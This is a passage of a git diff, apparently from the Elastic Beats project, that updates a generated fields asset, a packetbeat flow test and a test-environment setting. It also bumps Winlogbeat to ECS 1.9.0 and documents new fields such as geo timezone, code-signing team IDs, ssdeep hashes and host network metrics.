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" } diff --git a/packetbeat/tests/system/test_0060_flows.py b/packetbeat/tests/system/test_0060_flows.py index ab2e91bfbbc..ae6a4f923fb 100644 --- a/packetbeat/tests/system/test_0060_flows.py +++ b/packetbeat/tests/system/test_0060_flows.py @@ -47,6 +47,7 @@ def test_mysql_flow(self): 'source.bytes': 1480, 'destination.packets': 10, 'destination.bytes': 181133, + 'event.type': ['connection', 'end'], }) start_ts = parse_timestamp(objs[0]['event.start']) diff --git a/testing/environments/snapshot.yml b/testing/environments/snapshot.yml index 4f15ba5582f..c380f83ce9b 100644 --- a/testing/environments/snapshot.yml +++ b/testing/environments/snapshot.yml @@ -19,6 +19,7 @@ services: - "script.context.ingest.cache_max_size=2000" - "script.context.processor_conditional.cache_max_size=2000" - "script.context.template.cache_max_size=2000" + - "action.destructive_requires_name=false" logstash: image: docker.elastic.co/logstash/logstash@sha256:e01cf165142edf8d67485115b938c94deeda66153e9516aa2ce69ee417c5fc33 diff --git a/winlogbeat/_meta/fields.common.yml b/winlogbeat/_meta/fields.common.yml index 7467cad731a..fe6a1951027 100644 --- a/winlogbeat/_meta/fields.common.yml +++ b/winlogbeat/_meta/fields.common.yml @@ -360,6 +360,12 @@ logged. The category used by the Event Logging API (on pre Windows Vista operating systems) is written to this field. + - name: time_created + type: date + required: false + description: > + The event creation time. + - name: process.thread.id type: long required: false diff --git a/winlogbeat/cmd/root.go b/winlogbeat/cmd/root.go index 41259e7cab7..22a7c2562d1 100644 --- a/winlogbeat/cmd/root.go +++ b/winlogbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "winlogbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/winlogbeat/docs/fields.asciidoc b/winlogbeat/docs/fields.asciidoc index eae16b68e5c..1dbbbc3189e 100644 --- a/winlogbeat/docs/fields.asciidoc +++ b/winlogbeat/docs/fields.asciidoc @@ -92,6 +92,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -477,6 +486,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -534,6 +554,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -556,6 +588,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -569,9 +612,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -886,6 +932,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -903,6 +961,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -926,6 +996,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1092,6 +1174,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1149,6 +1242,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1171,6 +1276,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1184,9 +1300,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1405,6 +1524,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -1428,6 +1559,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1488,6 +1631,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2233,6 +2385,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2256,6 +2420,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2404,6 +2580,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -2894,6 +3079,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -2951,6 +3147,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -2973,6 +3181,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3010,8 +3229,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3050,6 +3270,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -3068,6 +3297,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3091,6 +3349,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3148,6 +3417,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3170,6 +3451,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3203,10 +3495,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -3219,6 +3514,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -3496,6 +3827,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4029,7 +4372,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4093,7 +4436,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4112,6 +4455,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4169,6 +4523,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4191,6 +4557,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4203,7 +4580,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4267,7 +4644,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4287,10 +4664,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -4860,6 +5240,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -4883,6 +5275,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5005,6 +5409,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -5059,6 +5472,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5082,6 +5507,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5204,6 +5641,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -5942,6 +6388,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -5999,6 +6456,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6021,6 +6490,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -6034,9 +6514,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6404,6 +6887,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + 